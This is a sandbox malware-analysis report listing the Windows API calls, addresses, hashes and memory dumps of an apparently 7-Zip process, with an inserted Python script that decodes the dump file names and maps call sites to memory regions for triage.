                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3934437811-0
                                                                                                                                                                                                                                • Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                                                • Instruction ID: 75bd6e2183db3bdb236f7e592a87357f32f1ae3ba6e822327a1e21144b962ae1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C81184637006848BCA209F25E9543AAA760E7627A4F484226EFA9077A9DF78D54AC710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                                                • Instruction ID: 697fbe99019b2417ee69f4d838ce611d3cd9af81677600195e6f117834b3a554
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B301D62220464481CE20EB22F95517E9331EBE67E4F485223BFBE577AADF38C54AC710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D89D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE ref: 001D8D51
                                                                                                                                                                                                                                • CreateFileW.KERNEL32 ref: 001D8DA4
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D8DB2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile$CloseHandlefree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 210839660-0
                                                                                                                                                                                                                                • Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                                                • Instruction ID: 0438f3c7b9179837868a9a2d5197cb9b8f082c47e6410562c0db91848acb10d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86218033104A819AC7609F55B951A9AB725F3A67F4F544322EFB943BE4CF38C896CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D3274: memmove.MSVCRT ref: 001D32AC
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212D41
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212DCF
                                                                                                                                                                                                                                • free.MSVCRT ref: 00212DFF
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$fputcfreememmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1158454270-0
                                                                                                                                                                                                                                • Opcode ID: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                                                                                                                • Instruction ID: 97ff6d1841a5d2e0599ec6c648c8fb00819c09dbebfcbf4e615901af23f239f6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0221356261460291CF24EF25E85139E6360FBB9BE4F449222ED6F47768DF3CC595C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3796167841-0
                                                                                                                                                                                                                                • Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                                                • Instruction ID: 14ae0aba2d625e4e51a1037973d22c08b822e180a559f41fe78653b3e2aee38d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35519373310755A7DB258F7AE6407A923A0FB44794F140627EF0E87B50DB39E8A6C740
                                                                                                                                                                                                                                APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputc
• String ID: Kernel
• API String ID: 1992160199-1736990243
APIs
• memset.MSVCRT ref: 0021B20D
• fputs.MSVCRT ref: 0021B232
  • Part of subcall function 001D2B04: _CxxThrowException.MSVCRT ref: 001D2B2D
  • Part of subcall function 001D2B04: free.MSVCRT ref: 001D2B44
Similarity
• API ID: ExceptionThrowfputsfreememset
• String ID:
• API String ID: 3104931167-0
APIs
• SetFilePointer.KERNELBASE(?,?,00000003,?,001D8E1D), ref: 001D8A99
• GetLastError.KERNEL32(?,?,00000003,?,001D8E1D), ref: 001D8AA6
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
Similarity
• API ID: fputcfputsfree
• String ID:
• API String ID: 2822829076-0
APIs
• memmove.MSVCRT ref: 0020404D
• memmove.MSVCRT ref: 00204087
  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
Similarity
• API ID: memmove$ExceptionThrowfreemalloc
• String ID:
• API String ID: 1415420288-0
APIs
• memmove.MSVCRT ref: 00204065
• memmove.MSVCRT ref: 00204087
  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
Similarity
• API ID: memmove$ExceptionThrowfreemalloc
• String ID:
• API String ID: 1415420288-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                                                • Instruction ID: d3a09df4fc8b7e945a30fab65a8a6a29392507c3659e9be4ab0befaa7856a4ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5F08123302A9486DA24AA26E84026D6720AB96FB1F188321DF7917BD1DF24C857C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 00210A42
                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00210A73
                                                                                                                                                                                                                                  • Part of subcall function 0021B480: GetTickCount.KERNEL32 ref: 0021B49E
                                                                                                                                                                                                                                  • Part of subcall function 0021B480: strcmp.MSVCRT ref: 0021B4E3
                                                                                                                                                                                                                                  • Part of subcall function 0021B480: wcscmp.MSVCRT ref: 0021B502
                                                                                                                                                                                                                                  • Part of subcall function 0021B480: strcmp.MSVCRT ref: 0021B568
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3267814326-0
                                                                                                                                                                                                                                • Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                                                • Instruction ID: 45cd26bed9eada7fc52e55a913da85dc63637ed51bccd7e4e248d02d2917a071
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6F0BE72220A9082E7108F24E8883986370E748BB4F104331EE7D477E8CF3C858AC304
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                                                • Instruction ID: 28b300f62202594946f405c5701c32af1cbfd82de6dd38c8a591cfcb7e0d4133
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FE0376225854051CE20EB20E45105A6720E7F57F4B482313FABF577F9DF38C645CB10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowmalloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2436765578-0
                                                                                                                                                                                                                                • Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                                                • Instruction ID: 722b661f1dd57d299a448be7bf8cb935bcd84960ec8ec2a7acb861f434f370d6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDD01250B276C4D1DE44A75498853545760A7B9740F9450A6F66E01725DA6CC1DF8B01
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                                                • Instruction ID: 2d75dfb740b0b7d77c11b0a3c125eb24cb897f9cef22762cfacfaf7d8103a544
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8513672644EC496CB62CF26C4602ED3B65F389F98F6D4236DE9A4A719DF34C885C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4236320881-0
                                                                                                                                                                                                                                • Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                                                • Instruction ID: 250956b53e618c9d28acb13f4df2d1ff19c2e7c419260c338a18debc6bb5c955
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E711822621878582E760AB29A5407BE7360E7847A4F644321EFDA577E4EF3CCD85C705
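Every function entry above lists the same five memory dumps, and the dump names encode where in process 11 the code was read from. The following decoder is an added example, not Joe Sandbox code. What it decodes is inferred from the entries themselves (field 1 is the PID in hex, 0xB, and field 2 the stage, which together with the 001D0000 base match the snapshot name hcaresult_11_2_1d0000) and from the documented Win32 PAGE_* and MEM_* constants, which fit the layout seen here: a read-only header at 001D0000, an execute-read code region at 001D1000 and a read-write region at 0023C000, all MEM_IMAGE. The serial in field 3 and fields 6 and 8 are kept as opaque strings because their meaning is not established; treating each region as extending to the next region's base is also an assumption, since the names carry no size. The sample inputs are the dump names and "ref:" addresses from this section.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Documented Win32 memory constants (not taken from the report).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

HEX = r"[0-9A-Fa-f]"
_SDMP = re.compile(
    rf"^({HEX}{{8}})\.({HEX}{{8}})\.(\d+)\.({HEX}{{16}})\."
    rf"({HEX}{{8}})\.({HEX}{{8}})\.({HEX}{{8}})\.({HEX}{{8}})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int        # field 1, hex (0000000B -> 11, matches hcaresult_11_...)
    stage: int      # field 2, hex (2, matches hcaresult_11_2_...)
    serial: str     # field 3, kept opaque (assumption: meaning not established)
    base: int       # field 4, hex start address of the dumped region
    protect: str    # field 5 decoded with PAGE_PROTECT
    mem_type: str   # field 7 decoded with MEM_TYPE
    field6: str     # not decoded
    field8: str     # not decoded
    name: str


def parse_sdmp(name: str) -> DumpRegion:
    """Split a .sdmp file name into its fields and decode the ones we understand."""
    m = _SDMP.match(name)
    if not m:
        raise ValueError(f"not a .sdmp dump name: {name!r}")
    f = m.groups()
    prot, mtype = int(f[4], 16), int(f[6], 16)
    return DumpRegion(
        pid=int(f[0], 16), stage=int(f[1], 16), serial=f[2], base=int(f[3], 16),
        protect=PAGE_PROTECT.get(prot & 0xFF, f"0x{prot:x}"),
        mem_type=MEM_TYPE.get(mtype, f"0x{mtype:x}"),
        field6=f[5], field8=f[7], name=name,
    )


def module_layout(names: List[str]) -> List[DumpRegion]:
    """All dumps of one module ordered by base; refuses mixed-process input."""
    regions = sorted((parse_sdmp(n) for n in names), key=lambda r: r.base)
    pids = {r.pid for r in regions}
    if len(pids) != 1:
        raise ValueError(f"dumps span several processes: {sorted(pids)}")
    return regions


def region_for(address: int, regions: List[DumpRegion]) -> Optional[DumpRegion]:
    """Region with the largest base <= address. Assumption: each region runs up
    to the next region's base, because the dump names carry no size."""
    best = None
    for r in regions:
        if r.base <= address and (best is None or r.base > best.base):
            best = r
    return best


def is_wx(region: DumpRegion) -> bool:
    """Writable and executable at once: where unpacked or patched code usually lands."""
    return region.protect in ("PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY")


# Sample input: the five dump names listed for each function in this section.
REPORT_DUMPS = [
    "0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp",
    "0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp",
    "0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp",
    "0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp",
    "0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp",
]
# Sample input: call sites taken from the "ref:" entries above.
REPORT_REFS = {"EnterCriticalSection": 0x210A42, "GetTickCount": 0x21B49E, "SetEndOfFile": 0x1D8CC7}


def triage(names: List[str], refs: Dict[str, int]) -> Dict[str, str]:
    """Map each referenced call site to the protection of the region it sits in,
    so a reference outside an executable region stands out."""
    regions = module_layout(names)
    return {api: region_for(addr, regions).protect for api, addr in refs.items()}


if __name__ == "__main__":
    for r in module_layout(REPORT_DUMPS):
        print(f"pid={r.pid} stage={r.stage} base=0x{r.base:08X} {r.protect:22} {r.mem_type} wx={is_wx(r)}")
    print(triage(REPORT_DUMPS, REPORT_REFS))
```

All three call sites resolve to the PAGE_EXECUTE_READ region at 001D1000, which is what one expects for code compiled into the image; a reference resolving into the PAGE_READWRITE region at 0023C000, or any region reported as is_wx, would be the point to start looking for unpacked code.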
APIs
  • Part of subcall function 001D8A60: SetFilePointer.KERNELBASE(?,?,00000003,?,001D8E1D), ref: 001D8A99
  • Part of subcall function 001D8A60: GetLastError.KERNEL32(?,?,00000003,?,001D8E1D), ref: 001D8AA6
• SetEndOfFile.KERNELBASE ref: 001D8CC7
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorLastPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 841452515-0
                                                                                                                                                                                                                                • Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                                                • Instruction ID: a101f5f77360401881e4c10c653d9a0050dbbf1faaabc06f040bd9aab8da8633
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06E07D12311894D3E7209FF1A5827EA8324BB457E0F488033AE4943B48CF75CCDAC710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D6464: FreeLibrary.KERNELBASE(?,?,?,001D64E7), ref: 001D6475
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE ref: 001D64F4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 534179979-0
                                                                                                                                                                                                                                • Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                                                • Instruction ID: a4937a5bb2940542fc22bed973d1d00687fe5e4e01b2e45103faab73821ccdf9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4ED0A722701765D6FF242BB679457A903152F16BE1E88D031DE4D43355DF694CEBE310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
